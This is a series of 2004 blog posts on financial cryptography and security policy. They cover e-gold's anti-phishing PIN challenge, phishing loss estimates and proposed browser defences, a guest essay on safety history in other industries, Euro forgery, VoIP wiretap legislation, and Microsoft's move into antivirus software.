    The operators would be negligent. Grossly and criminally, probably, as if a plane were to go down through cell phone interference, saying "but we said 'turn it off'" simply doesn't cut the mustard.

    So, presumably, planes are not vulnerable to cell phones.

    PS: so why did operators ban phones? Two reasons that I know of. In the US, there were complaints that the fast moving phones were confusing the cells. Also, the imminent roll-out of in-flight phones in many airlines was known to be a dead duck if passengers could use their cellphones...

    [1] To talk or not to talk, Rob Bamforth
    http://www.theregister.co.uk/2004/08/09/in_flight_comms/
    [2] Miracles and Wonders By Alan Cabal
    http://www.nypress.com/17/30/news&columns/AlanCabal.cfm
    [3] This extraordinarily flawed security analysis leaves one gaping... but it does show that if a cellphone is blasting away 30cm from flight deck equipment, there might be a problem.
    http://www.caa.co.uk/docs/33/FOD200317web.pdf

    Posted by iang at 05:05 AM | Comments (1) | TrackBack

    July 31, 2004

    e-gold stomps on phishing?

    Almost forgotten in the financial world, but e-gold, the innovative digital gold currency issuer based in Florida, USA (and nominally in Nevis, East Caribbean), was one of the biggest early targets for phishing [1]. Because of their hard money policy, stolen e-gold has always been as highly prized by crooks as by its fan base of libertarians and gold enthusiasts [2].

    Now it seems that they may have had success in stopping phishing and keylogging attacks; anecdotal reports indicate that their AccSent program has delivered the goods [3]. The company rarely announces anything these days, but the talk among the merchants and exchangers is that there's been relative peace since May. Before that, again anecdotally, losses seemed to be in the "thousands per day" mark, which racks up about a million over a year. Small beer for a major financial institution, but much more serious for e-gold which has on order of $10 million in float [4].

    From the feelings of merchants, it seems to have been somewhere between totally successful and stunningly successful. Nobody's prepared to state what proportion has been eliminated, but around 90% success rate is how I'd characterise it. Here's how it works, roughly [5]:

    "AccSent monitors account access attempts and issues a one-time PIN challenge to those coming from IP address ranges or browsers that differ from the last authorized account access. The AccSent advantage is that e-gold Users need not take any action - or even understand what an IP address or a phishing attack is - to immediately benefit from this innovative new feature. However, as powerful as AccSent is, the best protection against phishing and other criminal attacks is user education."

    If it stomps phishing and keylogging dead for e-gold, is this a universal solution? I don't think so. As welcome as it is, I suspect all this has done is pushed the phishers over to greener pastures - mainstream banks. If every financial institution were to implement this, then the phishers would just get more sophisticated.

    But in the meantime, this is a programme well worth emulating as even if it makes it just hard enough to push the victims down the street to the next muggins, that's welcome. This is the equivalent of putting deadlocks on your doors. The point is not to make your house impenetrable, but to make it harder than your neighbour's house.

    It's also welcome in that any defence allows the people who have to deal with this get to grips with phishing and keylogging attacks in a concrete manner. Until now, there's been precious little but hot air. Concrete benefits lead to understanding and better benefits. Hot air just leads to balloons.

    [1] Earliest report of a phishing attack on the company is 2001.

    [2] See the May Scale, the essential Internet moneterists guide showing e-gold at #3.

    [3] e-gold's Account Sentinel is described here: http://e-gold.com/accsent.html

    [4] Compare this with the guestimates of around a bllion for mainstream phishing losses:
    http://www.financialcryptography.com/mt/archives/000159.html

    [5] A news snippet here: http://e-gold.com/news.html

    Posted by iang at 12:19 PM | Comments (0) | TrackBack

    July 04, 2004

    Security Industry - a question of history

    Will Kamishlian has written an essay on the question I posed on the Internet security community last week: "why is the community being ignored?" It's a good essay, definitely worth reading for those looking for the "big" perspective on the Internet. Especially great is the tie-in to previous innovative booms and consequent failures in quality. Does it answer the question? You be the judge!


    [Will Kamishlian writes...] This is a long outburst. The reason for this is that I am tired of industry experts telling us that the growth of the Internet is something completely new and different. It isn't. Students of history can map and track the growth of the Internet against that of other industries. History *does not* repeat itself; however, historical conditions *do*. It is the study of historical conditions that allow us to understand the context of electronic commerce in modern society as a means to predict and plan for its growth. This outburst is not intended to be definitive; rather, I merely hope it will inspire thought.

    Here's the problem -- of personal information vulnerability as I see it from the lowest to the highest level.

    1. User Level

    The problem of phishing stems from the rendering of HTML from within an email client. I started to receive phish email long before I knew about the problem. I ignored these email messages because the URL in the email did not match that of my bank, etc. This would not be the case were I using a client that rendered messages in HTML.

    2. Software Provider Level

    Users want their Internet experience to be seamless and user-friendly. Therefore, software providers are going to continue to add new features and functionality to their email clients, browsers, etc. in a quest to provide an *easy* experience. Therefore, problem #1 is not going away. In fact, it will get worse. As new features are added, so too will new vulnerabilities. Software providers will -- as they have in the past -- patch these vulnerabilities piecemeal.

    3. Industry Level

    At the industry level, a widespread disagreement will remain about how to pro-actively protect the user. Individual software providers will resist any intervention that may potentially limit the features that they can provide to users. Therefore, problem # 2 is not going away.

    At the moment, the problem could be solved at the industry level. As the article notes, there is a dearth of neither security experts nor advice. The professionals exist. What is needed is a consortium that can agree on an extremely basic security model from which all security aspects can be devolved -- from models to specifications. The model must be so basic that no provider can argue with its validity. Extensions to this basic model would provide lower-level models from which specifications and certifications could be devolved.

    4. Societal Level

    Users want more features, and providers want to satisfy users; however, in doing so, users are getting harmed. In the long term, there are four possible scenarios for this state of affairs:

    * Over time, users will accept the harm and adopt the technology

    * Industry will adopt universal technology to prevent harm

    * Industry will create a third party to ensure safe guards

    * Government will step in to introduce safe guards

    By long term, I refer to a state of maturation for electronic commerce over the Internet.

    Ian's article caught my eye because I am a student of history, and have been tracking the Internet boom against other booms in the past, such as that of the growth of the railroad industry, from its inception to its maturity.

    The growth of the Internet mirrors the birth, boom and maturity of several industries. These come quickly to mind:

    * Railroad

    * Electrical

    * Airline

    * Automotive

    In each of these industries, consumers initially accepted a relatively high risk of potential harm as a cost of doing business. As each of these industries matured, consumer pressure produced improvements in consumer safety. Note that the author refers to these industries as they grew in the United States.

    Regarding the current state of affairs for electronic commerce, we can draw lessons from the means by which each of the above industries responded to the pressures for consumer safety. Each of the above responded in a unique manner to societal pressures for consumer safety.

    Railroad Industry

    Major railroad disasters caught the public attention (much as airline disasters do now) during the 1860's and 1870's. Over time, industry players universally adopted safety technology -- primarily the telegraph and air brakes -- that did much to improve consumer safety. The final piece of railroad consumer safety was put in place when the industry convened to adopt standard time -- an institution that lives with us today. The universal adoption of new technology and of standard time was possible because by the 1870's there were a few major players, which could impose their will on the entire industry, and which could foresee that consumer safety improvements would lead to increased revenues.

    Electrical Industry

    The electrical industry responded in a manner much different from that of the railroad industry. Unlike the railroad industry, there were no headlines of failures leading to the deaths of tens of people at a time. On the other hand, adoption of electricity in the home was slowed by the fact that electricity represented a very new and unknown (to the consumer) technology, so that electrical accidents -- in the industry's infancy -- were accorded the horror of the unknown.

    During the infancy of the electrical infancy, major players realized that they could achieve widespread adoption by ensuring consumer safety. At the same time, insurance companies were often bearing the cost for electrical catastrophes. The insurance companies, in conjunction with the electrical industry, created the Underwriters' Laboratory -- another institution that lives with us today. Thus, a third party was created with the single goal of providing consumer safety.

    Airline Industry

    Consumer safety in the airline industry progressed in a way dissimilar to both of the above. During the 1930's, the public was horrified by news accounts of airline disasters (much as the public had been horrified by train disasters decades earlier). The difference between the 1930's and the 1870's is that by the 1930's, consumers had adopted the notion that the government could and should enact legislation to ensure consumer safety. As a result, societal pressures built to the point that politicians quickly stepped in to provide consumer safety, and the forerunner to the Federal Aviation Administration (FAA) was formed. The FAA now influences airline passenger safety on a worldwide level.

    Automotive Industry

    The automotive industry comes last on this list because it was forced to adopt consumer safety measures long after this industry had matured. The reasons for this are that unlike the railroad and airline industries, catastrophes did not make front page news, and unlike the electrical industry, the technology did not represent the unknown -- automobiles were an advancement on the horse and buggy. Until the 1960's, consumers accepted a relatively low level of safety because safety was viewed as a consumer issue.

    Safety in the automotive industry changed in the 1960's, due in large part to the efforts of Ralph Nader. Nader used statistics to demonstrate the lack of concern on the part of the automotive industry. While individual car crashes did not make front page news, Nader's statistics of thousands of preventable deaths did make news. Auto makers did not initially respond to the societal pressure that Nader created, and as a result, the government stepped in. The Department of Transportation began to promulgate automotive safety regulation.

    During the 1970's class action lawsuits brought a new type of pressure on the automotive industry. Huge payouts in cases, such as the Ford Pinto suit, brought us a new breed of lawyer adept at winning large sums from juries sympathetic to descriptions of death and bodily harm caused by negligence on the part of manufacturers. I do not have a strong opinion on what the net effect that these lawsuits have had on consumer safety; however, I suspect that these lawsuits have increased costs to the consumer in greater measure than they have improved overall consumer safety. Class action lawsuits are won when the defendent is found *provably* negligent. The lesson to the industry is to not be caught *provably* negligent.

    The Electronic Commerce Industry

    Where does all of this history leave us? We can find relevant historical conditions from each of these industries, and from these conditions, we can plan for the future of electronic commerce. From the foregoing, we can accept that consumers expect the government to step in quickly whenever an industry is viewed as negligent with regard to consumer safety (as in the airline and automotive industries).

    The infancy of the electronic commerce industry is similar to that of the electrical industry in that the Internet has an aspect of the unknown, although unlike the electrical industry, failures and accidents in the electronic commerce industry do not lead to death or injury. Nevertheless, we can expect that consumer adoption of electronic commerce will be slowed until consumers are reassured that their safety is protected by a technology they do not understand.

    Unlike the railroad and airline industries, failures in electronic commerce do not usually make front page news. On the other hand, politicians and interest groups are beginning to weigh in with statistics -- at a governmental level. We can expect that there will be pressure on the government to regulate this industry. Witness the quick passage of legislation designed to prevent spam.

    Like the railroad industry, there are a few major players (that provide electronic commerce software) that could move to self-regulate the entire industry. To simplify the current state of affairs, Microsoft will not adhere to standards that it either does not control or that may limit its ability to offer new features. Other players are loath to adhere to standards that Microsoft controls. Therefore, we cannot expect that the major players in the software industry will move to self-regulate *unless*, as was the case with the railroad industry, the major players come to believe that cooperation would lead to higher revenues for all participants.

    Unlike the railroad industry, it is unlikely that a massive improvement in consumer safety could result from universal adoption of a few key pieces of technology. Electronic commerce, like the airline industry, has too many points of potential failure for a simple widespread solution. Therefore, we cannot expect technology to come to the rescue.

    The interesting thing about the electrical industry is that it was insurers who moved to form the UL because insurers paid the costs of electrical catastrophes. At the moment, the costs of electronic commerce failures are being borne by consumers and a wide variety of providers (banks, retailers, etc.). The lesson here an industry, bearing the costs of failure in another industry, can act in concert to compel improvements in consumer safety.

    Coming lastly to the automotive industry, we can see a parallel in that consumer safety in electronic commerce is much viewed as a cost of doing business. Most consumers recognize that risks exist, however unknowable, yet this is accepted as the cost of conducting business online. Electronic commerce failures do not make front page news; however, we can expect that consumer interest groups and politicians will be making headlines with statistics of people harmed by electronic commerce. Perhaps, the electronic commerce industry will come under fire from lawyers who can easily identify large groups of consumers *harmed* by rich software development companies.

    Looking Forward

    From the foregoing, we can see that consumer adoption of electronic commerce will be hampered until consumers perceive that a higher level of safety is provided. We can expect no silver bullet in terms of technology. We can expect -- absent credible efforts by the industry to self-regulate -- that politicians will come under increasing pressure to regulate electronic commerce. The software industry powers will work to thwart that pressure; however, they may be unsuccessful -- especially when one considers the power wielded by the big three automakers during the 1960's.

    The question is, will the industry move to self-regulate before government moves in? In my opinion, the best hope for self-regulation would be in parallel industries -- especially banking. I believe it is unlikely that software providers will commonly agree that improved consumer safety would lead to revenue growth for all. On the other hand industries, such as banking, are bearing an increasing share of costs for failures in electronic commerce, and those that bear the costs are likely to move in concert -- as did insurers by forming the UL. If pressure were brought to bear, I think that these adjacent industries might bring the best results in terms of self-regulation.

    So, we are left rolling our own, until either government or adjacent industries step in to create standards for consumer safety regarding electronic commerce. Our only hope for preventing onerous government regulation lies in convincing these adjacent industries that by acting in concert, they can reduce their costs by improving consumer safety on the Internet.

    Posted by iang at 03:48 AM | Comments (1) | TrackBack

    June 30, 2004

    Question on the state of the security industry

    A question I posed on the cryptography mailing list: The phishing thing has now reached the mainstream, epidemic proportions that were feared and predicted in this list over the last year or two. Many of the "solution providers" are bailing in with ill- thought out tools, presumably in the hope of cashing in on a buying splurge, and hoping to turn the result into lucrative cash flows.

    Sorry, the question's embedded further down...

    In other news, Verisign just bailed in with a service offering [1]. This is quite cunning, as they have offered the service primarily as a spam protection service, with a nod to phishing. In this way they have something, a toe in the water, but they avoid the embarrassing questions about whatever happened to the last security solution they sold.

    Meanwhile, the security field has been deathly silent. (I recently had someone from the security industry authoritively tell me phishing wasn't a problem ... because the local plod said he couldn't find any!)

    Here's my question - is anyone in the security field of any sort of repute being asked about phishing, consulted about solutions, contracted to build? Anything?

    Or, are security professionals as a body being totally ignored in the first major financial attack that belongs totally to the Internet?

    What I'm thinking of here is Scott's warning of last year [2]:

    Subject: Re: Maybe It's Snake Oil All the Way Down
    At 08:32 PM 5/31/03 -0400, Scott wrote:
    ...
    >When I drill down on the many pontifications made by computer
    >security and cryptography experts all I find is given wisdom.  Maybe
    >the reason that folks roll their own is because as far as they can see
    >that's what everyone does.  Roll your own then whip out your dick and
    >start swinging around just like the experts.

    I think we have that situation. For the first time we are facing a real, difficult security problem. And the security experts have shot their wad.

    Comments?

    iang


    [1] Lynn Wheeler's links below if anyone is interested:
    VeriSign Joins The Fight Against Online Fraud
    http://www.informationweek.com/story/showArticle.jhtml;jsessionid=25FLNINV0L5DCQSNDBCCKHQ?articleID=22102218
    http://www.infoworld.com/article/04/06/28/HNverisignantiphishing_1.html
    http://zdnet.com.com/2100-1105_2-5250010.html
    http://news.com.com/VeriSign+unveils+e-mail+protection+service/2100-7355_3-5250010.html?part=rss&tag=5250010&subj=news.7355.5


    [2] sorry, the original email I couldn't find, but here's the thread, routed at:
    http://www.mail-archive.com/cpunks@minder.net/msg01435.html

    Posted by iang at 06:55 AM | Comments (9) | TrackBack

    June 25, 2004

    Forging the Euro

    Anecdotally, it seems that now Europe has a world class currency, it's attracted world class forgers [1]. Perhaps catching the Issuer by surprise, the ECB and its satellites is facing significant efforts at injecting false currency. Oddly enough, the Euro note is very nice, and hard to forge. Which makes the claim that only the special note departments in the central banks can tell the forgeries quite a surprise.

    Still, it is tiny amounts. I've heard estimates of 30% of the dollar issue washing around the poorer regions is forged, so it doesn't seem as though the gnomes in Frankfurt have much to complain about as yet.

    And, it has to be taken as an accolade of sorts. If a currency is good, it is worth forging. Something we discovered in the digital cash world was that attacks against the system don't start until the issuer has moved about a million worth in float, and has a thousand or so users. Until then, the crooks haven't got the mass to be able to hide in, it's the case with some of these smaller systems that "everyone knows everyone" and that's a bit limiting if you are trying to fence some value through the market makers.

    [1] http://www.dw-world.de/english/0,3367,1431_A_1244689_1_A,00.html

    Posted by iang at 07:33 AM | Comments (0) | TrackBack

    June 23, 2004

    Phishing II - Front Page News

    As well as the FT review, in a further sign that phishing is on track to being a serious threat to the Internet, Google yesterday covered phishing on the front page. 37 articles in one day didn't make a top story, but all signs are pointing to increasing paranoia. If you "search news" then you get about 932 stories.

    It's mainstream news. Which is in itself an indictment of the failure of Internet security, a field that continues to reject phishing as a threat.

    Let's recap. There are about three lines of potential defense. The user's mailer, the user's browser, and the user herself.

    (We can pretty much rule out the server, because that's bypassed by this MITM; some joy would be experienced using IP number tracking, but that can by bypassed and it may be more trouble than it's worth.... We can also pretty much rule out authentication, as scammers that steal hundreds of thousands have no trouble stealing keys. Also in the bit bucket are the various strong URL schemes, which would help, but only when they have reached critical mass. No hope there.)

    In turn, here's what they can do against phishing:

    The user's mailer can only do so much here - it's job is to take emails, and that's what it does. It has no way of knowing that an email is a phishing attack, especially if the email carefully copies a real one. Bayesian filters might help here, but they are also testable, and they can be beaten by the committed attacker - which a phisher is. Spam tech is not the right way of thinking, because if one spam slips through, we don't mind. In contrast, if a phish slips through, we care a lot (especially if we believe the 5% hit rate.).

    Likewise, the user is not so savvy. Most of the users are going to have trouble picking the difference between a real email and a fake one, or a real site and a fake one. It doesn't help that even real emails and sites have lots of subtle problems with them that will cause confusion. So I'd suggest that relying in the user as a way to deal with this is a loser. The more checking the better, and the more knowledge the better, but this isn't going to address the problem.

    This leaves the browser. Luckily, in any important relationship, the browser knows, or can know, some things about that relationship. How many times visited, what things done there, etc etc. All the browser has to do then is to track a little more information, and make the user aware of that information.

    But to do that, the browsers must change. The'yve got to change in 3 of these 4 ways:

    1. cache certificate use statistics and other information, on a certificate and URL basis. Some browsers already cache some info - this is no big deal.
    2. display the vital statistics of the connection in a chrome (protected) area - especially the number of visits. This we call the branding box. This represents a big change to browser security model, but, for various reasons, all users of browsers are going to benefit.
    3. accept self-signed certs as *normal* security, again displayed in the chrome. This is essential to get people used to seeing many more cert-protected sessions, so that the above 2 parts can start to work.
    4. servers should bootstrap as a normal default behavoiur using an on-demand generated self-signed cert. Only when it is routine for certs to be in existance for *any* important website, will the browser be able to reliably track a persistency and the user start to understand the importance of keeping an eye on that persistency.

    It's not a key/padlock, it's a number. Hey presto, we *can* teach the user what a number means - it's the number of times that you visited BankofAmerica.com, or FunkofAmericas.co.mm or wheresover you are heading. If that doesn't seem right, don't enter in any information.

    These are pretty much simple changes, and the best news is that Ye & Smith's "Trusted Paths for Browsers" showed that this was totally plausible.

    Posted by iang at 10:59 AM | Comments (0) | TrackBack

    Phishing I - Penny Black leads to Billion Dollar Loss

    Today, the Financial Times leads its InfoTech review with phishing [1]. The FT has new stats: Brightmail reports 25 unique phishing scams per day. Average amount shelled out for 62m emails by corporates that suffer: $500,000. And, 2.4bn emails seen by Brightmail per month - with a claim that they handle 20% of the world's mail. Let's work those figures...

    That means 12bn emails per month are scams. If 62m emails cause costs of half a million, then that works out at $0.008 per email. 144bn emails per year makes for ... $1.152 billion dollars paid out every year [2].

    In other words, each phishing email is generating losses to business of a penny. Black indeed - nobody has been able to show such a profit model from email, so we can pretty much guarantee that the flood is only just beginning.

    (The rest of the article included lots of cartels trying to peddle solutions, and a mention that the IETF things email authentication might help. Fat chance of that, but it did mention one worrying development - phishers are starting to use viral techniques to infect the user's PC with key loggers. That's a very worrying development - as there is no way a program can defeat something that is permitted to invade by the Microsoft operating system.)

    [1] The Financial Times, London, 23rd June 2004,
    "Gone phishing," FT-IT Review.
    [2] Compare and contrast this 1 billion dollar loss to the $5bn claimed by NYT last week:
    "Phishing an epidemic, Browsers still snoozing"
    http://www.financialcryptography.com/mt/archives/000153.html



    Addendum 2004-07-17: One article reports that Phishing will cost financial firms $400m in 2004, and another article, Firms hit hard by identity theft reports:

    "While it's difficult to pin down an exact dollar amount lost when identity thieves strike such institutions, Jones said 20 cases that have been proposed for federal prosecution involve $300,000 to $1 million in losses each."

    This matches the amount reported in the Texas phishing case, although it refers to identity theft, not phishing (yes, they are not the same).



    Addendum 2004-07-27: Amir Herzberg and Ahmad Gbara report in their draft paper :
    A study by Gartner Research [L04] found that about two million users gave such information to spoofed web sites, and that "Direct losses from identity theft fraud against phishing attack victims -- including new-account, checking account and credit card account fraud" cost U.S. banks and credit card issuers about $1.2 billion last year.

    [L04] Avivah Litan, Phishing Attack Victims Likely Targets for Identity Theft, Gartner FirstTake, FT-22-8873, Gartner Research, 4 May 2004



    Addendum 2008-09-03 Fighting Phish, Fakes and Frauds talks about additional support calls costs and users who depart from ecommerce.

    Posted by iang at 10:30 AM | Comments (1) | TrackBack

    June 18, 2004

    FBI asks US Congress to repeal laws of physics

    In our world, we are very conscious of the natural order of life. First comes physics. From physics is derived economics, or the natural costing of things. And finally, law cleans up, adding things like dispute resolution (us techies call them edge cases). Notwithstanding that this ordering has been proven over any millenium you care to pick, sometimes, more often than one would merit, people ask for lawmakers to ignore the reality of life and to regulate certain inevitable behaviours into some sort of limbo of illegal normality.

    Such it is with Internet telephony, also known as VOIP (voice over IP): Internet machines are totally uncontrollable, at a basic fundamental physical level. It was designed that way, and the original architects forgot to include the flag for legislative override. Further, Internet machines can do voice communications.

    From those two initial assumptions, we can pretty much conclude that any attempt to regulate VOIP will fail. And that all the perks now enjoyed by large dominating parties of power (e.g., governments) will fade away.

    Yet, the US Department of Justice is asking Congress to regulate wire taps on VOIPs [1]. This looks like a repeat of the crypto wars in the 90s. Almost lost and definitely bungled by the FBI, the crypto wars were won by the NSA and its rather incredible sense of knowing when to ease off a bit.

    Reading the below article, one of two by Declan McCulloch, it is at least hopeful to see that Congressmen are starting to express a bipartisan skepticism to the nonsense dished up in the name of terrorism. Why doesn't the DoJ and its primary arm, the FBI "get it?" It's unsure, but when a police force decides that protection of the faltering revenues of Hollywood is its 3rd biggest priority [2], another unwinnable battle against physics, one can only expect more keystone cops action in the future [3].

    Here's the pop quiz of the week - what technologies can be thought to "aid, abet, induce, counsel or procure" violation of copyright? There is no prize for photocopying, laser printers, cassette recorders, CD and DVD burners, PCs, software, cameras, phones, typewriters ... Surely we can come up with something that is an innovative inducer of the #3 crime - copyright violation?

    [1] Declan McCullagh, Feds: VoIP a potential haven for terrorists
    http://zdnet.com.com/2102-1105_2-5236233.html?tag=printthis
    [2] http://www.financialcryptography.com/mt/archives/000072.html does record where:
    FBI weighs into anti-piracy fight
    http://newsvote.bbc.co.uk/mpapps/pagetools/print/news.bbc.co.uk/1/hi/entertainment/music/3506301.stm
    [3] Declan McCullagh, Antipiracy bill targets technology
    http://news.com.com/2102-1028_3-5238140.html?tag=st.util.print



    Feds: VoIP a potential haven for terrorists
    By Declan McCullagh CNET News.com June 16, 2004, 10:54 AM PT

    WASHINGTON--The U.S. Department of Justice on Wednesday lashed out at Internet telephony, saying the fast-growing technology could foster "drug trafficking, organized crime and terrorism."

    Laura Parsky, a deputy assistant attorney general in the Justice Department, told a Senate panel that law enforcement bodies are deeply worried about their ability to wiretap conversations that use voice over Internet Protocol (VoIP) services.

    "I am here to underscore how very important it is that this type of telephone service not become a haven for criminals, terrorists and spies," Parsky said. "Access to telephone service, regardless of how it is transmitted, is a highly valuable law enforcement tool."

    Police been able to conduct Internet wiretaps for at least a decade, and the FBI's controversial Carnivore (also called DCS1000) system was designed to facilitate online surveillance. But Parsky said that discerning "what the specific (VoIP) protocols are and how law enforcement can extract just the specific information" are difficult problems that could be solved by Congress requiring all VoIP providers to build in backdoors for police surveillance.

    The Bush administration's request was met with some skepticism from members of the Senate Commerce committee, who suggested that it was too soon to impose such weighty regulations on the fledgling VoIP industry. Such rules already apply to old-fashioned telephone networks, thanks to a 1994 law called the Communications Assistance for Law Enforcement Act (CALEA).

    "What you need to do is convince us first on a bipartisan basis that there's a problem here," said Sen. Ron Wyden, D-Ore. "I would like to hear specific examples of what you can't do now and where the law falls short. You're looking now for a remedy for a problem that has not been documented."

    Wednesday's hearing was the first to focus on a bill called the VoIP Regulatory Freedom Act, sponsored by Sen. John Sununu, R-N.H. It would ban state governments from regulating or taxing VoIP connections. It also says that VoIP companies that connect to the public telephone network may be required to follow CALEA rules, which would make it easier for agencies to wiretap such phone calls.

    The Justice Department's objection to the bill is twofold: Its wording leaves too much discretion with the Federal Communications Commission, Parsky argued, and it does not impose wiretapping requirements on Internet-only VoIP networks that do not touch the existing phone network, such as Pulver.com's Free World Dialup.

    "It is even more critical today than (when CALEA was enacted in 1994) that advances in communications technology not provide a haven for criminal activity and an undetectable means of death and destruction," Parsky said.

    Sen. Frank Lautenberg, D-N.J., wondered if it was too early to order VoIP firms to be wiretap-friendly by extending CALEA's rules. "Are we premature in trying to tie all of this down?" he asked. "The technology shift is so rapid and so vast."

    The Senate's action comes as the FCC considers a request submitted in March by the FBI. If the request is approved, all broadband Internet providers--including companies using cable and digital subscriber line technology--will be required to rewire their networks to support easy wiretapping by police.

    Wednesday's hearing also touched on which regulations covering 911 and "universal service" should apply to VoIP providers. The Sununu bill would require the FCC to levy universal service fees on Internet phone calls, with the proceeds to be redirected to provide discounted analog phone service to low-income and rural American households.

    One point of contention was whether states and counties could levy taxes on VoIP connections to support services such as 911 emergency calling. Because of that concern, "I would not support the bill as drafted and I hope we would not mark up legislation at this point," said Sen. Byron Dorgan, D-N.D.

    Sen. Conrad Burns, R-Mont., added: "The marketplace does not always provide for critical services such as emergency response, particularly in rural America. We must give Americans the peace of mind they deserve."

    Some VoIP companies, however, have announced plans to support 911 calling. In addition, Internet-based phone networks have the potential to offer far more useful information about people who make an emergency call than analog systems do.



    Antipiracy bill targets technology

    By Declan McCullagh Staff Writer, CNET News.com

    A forthcoming bill in the U.S. Senate would, if passed, dramatically reshape copyright law by prohibiting file-trading networks and some consumer electronics devices on the grounds that they could be used for unlawful purposes.

    A bill called the Induce Act is scheduled to come before the Senate sometime next week. If passed, it would make whoever "aids, abets, induces (or) counsels" copyright violations liable for those violations.

    Bottom line:If passed, the bill could dramatically reshape copyright law by prohibiting file-trading networks and some consumer electronics devices on the grounds that they could be used for unlawful purposes.

    The proposal, called the Induce Act, says "whoever intentionally induces any violation" of copyright law would be legally liable for those violations, a prohibition that would effectively ban file-swapping networks like Kazaa and Morpheus. In the draft bill seen by CNET News.com, inducement is defined as "aids, abets, induces, counsels, or procures" and can be punished with civil fines and, in some circumstances, lengthy prison terms.

    The bill represents the latest legislative attempt by influential copyright holders to address what they view as the growing threat of peer-to-peer networks rife with pirated music, movies and software. As file-swapping networks grow in popularity, copyright lobbyists are becoming increasingly creative in their legal responses, which include proposals for Justice Department lawsuits against infringers and act
    ion at the state level.

    Originally, the Induce Act was scheduled to be introduced Thursday by Sen. Orrin Hatch, R-Utah, but the Senate Judiciary Committee confirmed at the end of the day that the bill had been delayed. A representative of Senate Majority Leader Bill Frist, a probable co-sponsor of the legislation, said the Induce Act would be introduced "sometime next week," a delay that one technology lobbyist attributed to opposition to the measure.

    Though the Induce Act is not yet public, critics are already attacking it as an unjustified expansion of copyright law that seeks to regulate new technologies out of existence.

    "They're trying to make it legally risky to introduce technologies that could be used for copyright infringement," said Jessica Litman, a professor at Wayne State University who specializes in copyright law. "That's why it's worded so broadly."

    Litman said that under the Induce Act, products like ReplayTV, peer-to-peer networks and even the humble VCR could be outlawed because they can potentially be used to infringe copyrights. Web sites such as Tucows that host peer-to-peer clients like the Morpheus software are also at risk for "inducing" infringement, Litman warned.

    Jonathan Lamy, a spokesman for the Recording Industry Association of America, declined to comment until the proposal was officially introduced.

    "It's simple and it's deadly," said Philip Corwin, a lobbyist for Sharman Networks, which distributes the Kazaa client. "If you make a product that has dual uses, infringing and not infringing, and you know there's infringement, you're liable."

    The Induce Act stands for "Inducement Devolves into Unlawful Child Exploitation Act," a reference to Capitol Hill's frequently stated concern that file-trading networks are a source of unlawful pornography. Hatch is a conservative Mormon who has denounced pornography in the past and who suggested last year that copyright holders should be allowed to remotely destroy the computers of music pirates.

    Foes of the Induce Act said that it would effectively overturn the Supreme Court's 1984 decision in the Sony Corp. v. Universal City Studios case, often referred to as the "Betamax" lawsuit. In that 5-4 opinion, the majority said VCRs were legal to sell because they were "capable of substantial noninfringing uses." But the majority stressed that Congress had the power to enact a law that would lead to a different outcome.

    "At a minimum (the Induce Act) invites a re-examination of Betamax," said Jeff Joseph, vice president for communications at the Consumer Electronics Association. "It's designed to have this fuzzy feel around protecting children from pornography, but it's pretty clearly a backdoor way to eliminate and make illegal peer-to-peer services. Our concern is that you're attacking the technology."

    Posted by iang at 03:56 PM | Comments (6) | TrackBack

    June 17, 2004

    Not news - AV producers slip as Microsoft "competes"

    Sometimes you see a business pattern like this: A company or government doesn't do its job. So up springs a service sector to fill the gap. After a while, everyone starts to think that's the natural state of affairs, but the canny business types know that these service providers are very vulnerable.

    Such is the case here [1]. When Microsoft started talking about providing its own anti-virus product, shares in Symantec and presumably other anti-virus (AV) producers started sliding.

    Hey ho, where's the news? Microsoft delivers a product that is weak on the security side, and strong on the user side. Now they've started working on security, and the turnaround has been painful and noisy, if not exactly measurable in progress terms.

    Any investor in Symantec and any similar anti-virus producer must have been able to connect the dots in Bill Gates famous memo from security to viruses. Of course the mission would include reducing the vulnerabilty to viruses, and of course there would be some serious thought to two possibilities: writing the code such that viruses aren't a threat (why do we need to say this?) and creating an in-house AV product so the synergies could be exploited.

    The latter is a stop-gap measure. But so is Symantec's anti-virus division: it's only there because Microsoft don't write good code. The day they stop this egregious practice is the day that we no longer need Symantec to take $100 out of our pocket for Microsoft's laziness.

    Of course, the state of understanding in the security industry is woefully underscored by the claim that Microsoft needs to sell it separately rather than bundle it. Since when is it anti-trust to deliver a secure product? And, who in Microsoft legal hasn't worked out that if they sell on the one hand a broken product, and on the other a fix for the same, the class action attornies are going to skip breakfast to get that one filed?

    [1] http://www.thestreet.com/tech/ronnaabramson/10166284.html
    Symantec Wobbled by Microsoft Threat



    Symantec Wobbled by Microsoft Threat

    By Ronna Abramson TheStreet.com Staff Reporter 6/16/2004 2:47 PM EDT

    Shares of Symantec (SYMC:Nasdaq - news - research) continued their recent slide Wednesday amid more definitive news that Microsoft (MSFT:Nasdaq - news - research) plans to enter its thriving antivirus software market.

    Shares of security titan Symantec were recently down $1.60, or 3.8%, to $40.82. The stock has shed about 7% since Friday's close, while the Nasdaq Composite has inched down less-than 0.5% during the same period.

    Shares of security rival Network Associates (NET:NYSE - news - research), another beneficiary of virus outbreaks, have declined 2.6% since Friday. Shares were recently down 20 cents, or 1.2%, at $16.72. Microsoft stock was recently off 17 cents, or 0.6%, to $27.24.

    Thanks to the anti-virus market, Symantec defied the economic downturn as other tech names were struggling. In April, the company's stock hit an all-time intraday high of $50.88.

    But Symantec shares began to tumble Monday after wire services wrote that Mike Nash, chief of Microsoft's security business unit, said at a dinner with reporters that the world's largest software maker is developing its own anti-virus products that will compete against Symantec and Network Associates.

    "We're still planning to offer our own [antivirus] product," Reuters quoted Nash as saying.

    Those comments came just two weeks after another Microsoft executive, Rich Kaplan, corporate vice president of security business and technology marketing, said the company was still undecided about what it would do with antivirus technology acquired last year from a Romanian security firm.

    Kaplan was not available for comment Wednesday. Instead, Amy Carroll, director of Microsoft's security business and technology unit, confirmed Nash's comments and Microsoft's intentions to enter the antivirus space in a telephone interview Wednesday.

    "What Mike said is not new," Carroll said. "Our plan is to offer an AV [antivirus] solution." The company has not yet announced a timeline for when the antivirus product will debut or details on exactly what shape it will take.

    Microsoft plans to offer an antivirus product or service for a fee, but will not bundle it with its ubiquitous Windows operating system, she added.

    Analysts have suggested that such bundling would undoubtedly raise antitrust eyebrows, given that Microsoft has been the subject of suits both in the U.S. and Europe, where regulators are still fighting the software behemoth over the bundling of its media player with Windows.

    Observers have offered plenty of reasons why they believed Microsoft would not enter the field. Chris Bonavico, a portfolio manager with Transamerica Investment Management, has suggested one reason Microsoft will not jump into the space is because security is a services business that requires around-the-clock responses to new attacks, and Microsoft isn't a services company.

